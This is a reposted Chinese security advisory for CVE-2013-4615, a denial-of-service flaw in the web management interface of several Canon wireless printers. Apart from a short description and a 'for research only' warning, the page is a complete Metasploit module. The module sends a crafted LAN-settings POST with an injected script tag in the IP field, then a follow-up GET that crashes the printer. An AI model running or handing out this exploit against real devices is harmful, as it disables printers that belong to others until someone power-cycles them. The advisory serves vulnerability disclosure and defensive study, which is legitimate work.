多款Canon打印机远程拒绝服务漏洞(CVE

发布日期:2013-06-18
更新日期:2013-06-21

受影响系统:
Canon Printers
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60598
 CVE(CAN) ID: CVE-2013-4615
 
Canon是日本著名的佳能打印机制造商。
 
Canon多款无线打印机的模块HTTP管理界面处理特制的HTTP请求时存在拒绝服务漏洞,可导致设备拒绝服务。
 
<*来源:Matt Andreko
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
+##
 +# This file is part of the Metasploit Framework and may be subject to
 +# redistribution and commercial restrictions. Please see the Metasploit
 +# web site for more information on licensing and terms of use.
 +# 
 +##
 +
 +require 'msf/core'
 +
 +class Metasploit3 < Msf::Auxiliary
 +
 +  include Msf::Exploit::Remote::HttpClient
 +  include Msf::Auxiliary::Dos
 +
 +  def initialize(info = {})
 +    super(update_info(info,
 +      'Name'          => 'Canon Wireless Printer Denial Of Service',
 +      'Description'    => %q{
 +        The HTTP management interface on several models of Canon Wireless printers
 +        allows for a Denial of Service condition via a crafted HTTP request. This
 +        requires the device to be turned off and back on again to restore use.
 +      },
 +      'License'        => MSF_LICENSE,
 +      'Author'        =>
 +      [
 +        'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
 +      ],
 +      'References'    => [
 +        [ 'CVE', '2013-4615' ],
 +        [ 'URL', 'http://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
 +      ],
 +      'DisclosureDate' => 'June 18 2013'))
 +    register_options([
 +      Opt::RPORT(80),
 +    ])
 +  end
 +
 +  def run
 +
 +    begin
 +
 +      # The first request will set the new IP
 +      res = send_request_cgi({
 +        'method'  =>  'POST',
 +        'uri'    =>  '/English/pages_MacUS/cgi_lan.cgi',
 +        'data'    =>  'OK.x=61' +
 +          '&OK.y=12' +
 +          '&LAN_OPT1=2' +
 +          '&LAN_TXT1=Wireless' +
 +          '&LAN_OPT3=1' +
 +          '&LAN_TXT21=192' +
 +          '&LAN_TXT22=168' +
 +          '&LAN_TXT23=1' +
 +          '&LAN_TXT24=114"><script>alert(\'xss\');</script>' +
 +          '&LAN_TXT31=255' +
 +          '&LAN_TXT32=255' +
 +          '&LAN_TXT33=255' +
 +          '&LAN_TXT34=0' +
 +          '&LAN_TXT41=192' +
 +          '&LAN_TXT42=168' +
 +          '&LAN_TXT43=1' +
 +          '&LAN_TXT44=1' +
 +          '&LAN_OPT2=4' +
 +          '&LAN_OPT4=1' +
 +          '&LAN_HID1=1'
 +      })
 +
 +      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
 +        print_error("Couldn't connect to #{rhost}:#{rport}")
 +        return
 +    end
 +
 +    # The second request will load the network options page, which seems to trigger the DoS
 +    send_request_cgi({
 +      'method'  =>  'GET',
 +      'uri'    =>  '/English/pages_MacUS/lan_set_content.html'
 +    }) #default timeout, we don't care about the response
 +    print_status("DoS payload sent to #{rhost}:#{rport}. Check the device for responsiveness.")
 +
 +  end
 +end

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxsfy.html